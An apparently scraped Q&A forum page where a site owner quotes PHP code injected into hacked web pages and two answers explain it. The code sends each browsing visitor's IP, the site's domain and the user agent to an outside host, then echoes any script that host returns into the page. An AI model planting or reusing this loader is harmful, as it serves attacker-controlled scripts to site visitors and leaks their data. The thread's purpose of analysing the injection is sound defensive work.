Geek Answers Handbook

Unauthorized code posted on web pages

Recently, the site with which I was linked was hacked with an unauthorized code located on several pages. I'm just wondering if anyone can shed light on what exactly this code does, and what benefit it will be for the user who posted it on these pages.

<?php #31e3cd# error_reporting(0); ini_set('display_errors',0); $wp_okpbo35639 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) && !preg_match ('/bot/i', $wp_okpbo35639))){ $wp_okpbo0935639="http://"."html"."-href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_okpbo35639); $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_okpbo0935639); curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_35639okpbo = curl_exec ($ch); curl_close($ch);} if ( substr($wp_35639okpbo,1,3) === 'scr' ){ echo $wp_35639okpbo; } #/31e3cd# ?>

Above is the code as it appeared on the pages. I played with this code and it looks like it is getting user information using:

 $_SERVER['HTTP_USER_AGENT']

It then combines into a URL similar to the one below, but with the user information above added to the URL

 http://html-href.com/href/?ip=::1&referer=localhost&ua=

I know that curl is used in data transfer, but where exactly is this information sent and what is its purpose?

+7
security php curl cracking
source share
2 answers

The code makes a call to the URL you specified, sending it to the user's IP address, the domain of your site, and the user useragent line. Then it prints on your site any code that it receives from the cURL request. The resulting code can be anything. This can be HTML, JavaScript, or any other client-side code. This is probably not server-side code, as there is no eval() executing the resulting code.

It seems to be designed for Internet Explorer, Chrome and FireFox browsers, but not for scanners / bots.

EDIT . As the FDL noted in his comment, this prints only if it receives a string in which the second, third and fourth characters are scr , which means that it probably only prints on the page if it received the <script> .

+7
source share

$ _ SERVER ['HTTP_USER_AGENT'] is used to check the type of web browser (or maybe a crawler) from which the client requests a resource based on the URL. For example, using this preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) snippet preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) it is used to check whether the browser is a Firefox client (Gecko) or IE (MSIE). But this is not a reliable way to determine the source browser, as user agents can easily be changed or switched.

+1
source share

More articles:


All Articles